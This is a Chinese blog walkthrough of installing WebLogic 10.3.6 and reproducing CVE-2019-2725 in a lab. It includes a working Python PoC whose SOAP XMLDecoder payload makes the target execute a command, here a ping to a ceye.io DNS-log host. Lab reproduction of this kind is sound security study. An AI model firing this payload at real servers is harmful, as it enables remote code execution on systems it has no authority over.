有些坑还是要去踩,上来就docker一脸懵逼。

1、应用

https://www.cnblogs.com/xdp-gacl/p/4140683.html

(1)安装

环境:

  • 64位server2016
  • jdk1.7
  • wls1036_generic.jar(11g)

下载好jar,之后执行 java -D64 -jar wls1036_generic.jar

下一步

ps:之后出现的邮件和代理请忽略

典型安装类型,下一步

找到本地jdk的安装路径,下一步

安装路径,下一步。安装概要,下一步,之后就会安装。

安装完成

(2)Quickstart配置

开始吧

新建域,下一步

域源不管,直接下一步。设置域名,域位置,这里默认,也不管。设置管理员用户名和密码,下一步。

选择模式和jdk,这里选择生产模式

可选配置先选管理服务器(中间件负载那些目前本菜鸡还没摸到,先不管),下一步

设置监听地址和端口和ssl,下一步

路径(如果改了路径,请找下):C:\Oracle\Middleware\user_projects\domains\base_domain下有个启动脚本bat,直接双击,之后输入账号密码。

  • 或者找到快捷方式启动Start Admin Server for Weblogic Server Domain,之后输入账号密码。

之后访问http://ip:port/console,看见控制台即可。部署war

参考:https://www.cnblogs.com/xiaozi/p/9214345.html

2、漏洞复现

(1)CVE-2019-2725/CNVD-C-2019-48814

#coding:utf-8

import requests

#平台不同,路径不同问题。

url="http://192.168.152.131:7001"

path='/_async/AsyncResponseService'

header={'content-type':'text/xml'}

#假设机器通外网

payload1='''

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>ping 236136123.xxxx.ceye.io</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

'''

try:

	rep=requests.get(url+path,timeout=3)

	if rep.status_code==200:

		r=requests.post(url+path,headers=header,data=payload1,timeout=3)

		if r.status_code==202:

			print url,"----","可能存在wls9-async组件反序列化漏洞"

except Exception as e:

	print "error"

#参考

#https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961

#https://www.t00ls.net/thread-50968-1-1.html

#回显poc  https://xz.aliyun.com/t/5299

Weblogic记录的更多相关文章

  1. weblogic每天日志合并shell脚本 [个人记录]【转】【补】

    from RogerZhu modified by King sh logback.rb "/data/logs/" "/tmp/domain" "a ...

  2. WebLogic 8.1 部署问题记录

    1.weblogic 8.1 不支持jdk1.4以上的版本,所以,如果在项目中用jdk1.4以上的版本编译之后的class直接部署到weblogic8.1 服务器上会报错,报错信息一般包括如下: Cl ...

  3. Weblogic漏洞修复记录

    1.CVE-2018-2628.CVE-2018-2893 以上两个漏洞均是针对weblogic的t3服务进行攻击,如果有条件的,可以从oracle官网下载最新的补丁安装http://www.orac ...

  4. weblogic安装错误记录

    问题1:/opt/oraInventory路径无效(无法读取/写入/执行) 查看目录权限,发现此目录属于dba,如果用这个目录的话,可能会覆盖掉Oracle数据库相关的东西 再参照weblogic静默 ...

  5. weblogic服务目录迁移记录

    weblogic服务,由于前期的规划不好,导致后期有点问题!为了更加规范运行服务及执行相关操作,故进行服务迁移... 先决条件:weblogic都是单个aminserver运行的,单个服务 问题解决: ...

  6. win7下weblogic安装与部署项目调试记录

    下载 weblogic12c, 官网下载通用版本 安装 略 下载jdk   jdk所有版本连接 http://www.oracle.com/technetwork/java/archive-13921 ...

  7. 记录一次维护weblogic集群的问题

    [问题描述] weblogic 集群子服务节点启动,启动完毕后状态改为 ADMIN,正常情况是 RUNNING 在启动脚本添加如下配置即可 -DDomainRegistrationEnabled=tr ...

  8. weblogic重要漏洞记录

    (PS:之前在freebuf发过,这里直接复制过来的,所以有些图片会有水印) 前言 T3协议存在多个反序列化漏洞CVE-2015-4852/CVE-2016-0638/CVE-2016-3510/CV ...

  9. IDEA+weblogic部署运行项目

    前段时间再服务器上为了部署一个系统,一直存在各种问题,不过过程中倒是把weblogic的部署掌握地特别熟练,下面就一些主要步骤做个记录:1.自己用的是IDEA,所以打开项目之后需要设置src/main ...

随机推荐

  1. centos7安装与配置nginx1.11,开机启动

    1.官网下载安装包 http://nginx.org/en/download.html,选择适合Linux的版本,这里选择最新的版本,下载到本地后上传到服务器或者centos下直接wget命令下载. ...

  2. 【DirectX12】第六章-练习

    练习3. (a) //LINELIST std::array<VPosData, > posData = { VPosData({ XMFLOAT3(-2.0f, -1.0f, +1.0f ...

  3. 网络结构---从alexnet 到resnet

    AlexNet-> vgg vgg 采用更小的卷积核,加深网络深度,但两者的共同点都是卷积层+pooling层最后接上fc 层的结构 Network in network ->google ...

  4. HDU-1709 The Balance(生成函数)

    题意 给$n$个数,有哪些属于$1$到$n$个数字总和$sum$的数是通过该集合任意子集之间的加减运算无法得到的. 思路 对每个数构造$x^{-a[i]}+1+x^{a[i]}$,为了避免负幂次可以将 ...

  5. CodeChef - COUNTREL Count Relations

    题目链接 给你一个长为NNN的1,2,3,....N1,2,3,....N1,2,3,....N的序列,让你求出两种关系各个有多少可能: R1R_1R1​,由于x,yx,yx,y互不是子集,且交集为空 ...

  6. less封装样式有规律的类选择器-遁地龙卷风

    1.解决的问题 .class-rule(p,2,width 20px animation-dely 0.1s);可以生成下列css样式 .p2 { animation-dely: 0.2s; widt ...

  7. 基于Python的Webservice开发(二)-如何用Spyne开发Webservice

    一.功能需求 本次案例是开发一个Item的新建的WebService.IN&OUT的类型JsonDocument. 通过传入相关的参数创建Item,且相关的参数可以被缺省. 二.实现代码 引入 ...

  8. 解决多个py模块调用同一个python的logging模块,打印日志冲突问题

    前期对python中的logging模块进行了封装,这样自动化测试框架中的多个测试脚本(py)就可以使用同一个封装后的日志系统,这样各脚本中只需要引用一下即可,方面快捷.那么当我使用unittest框 ...

  9. gatewayworker开发单聊应用解决的问题

    绑定唯一id时,遇到的信息发送同步问题 问题:A-B A-C A发送信息给B和C时  A绑定了唯一id  若B.C发送信息给A则A处会同时手到来自于BC的信息 用解绑和生成新的client_id无法避 ...

  10. day13 Python数据基本类型

    算数运算 / x除以y // 取整除 %返回除法的余数 !=   不等于 <> 不等于 赋值运算 c+= a等价于c=c+a c-= a等价于c=c-a 逻辑运算 and or not 基 ...